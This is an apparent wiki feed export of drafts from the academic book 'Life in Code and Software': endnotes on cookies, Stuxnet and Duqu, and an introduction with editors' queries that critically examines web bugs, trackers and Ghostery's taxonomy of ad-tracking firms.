&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the interal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that has been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious, for instance Cryptome (2010) argues: It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4695</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4695"/>
		<updated>2012-04-18T13:31:04Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
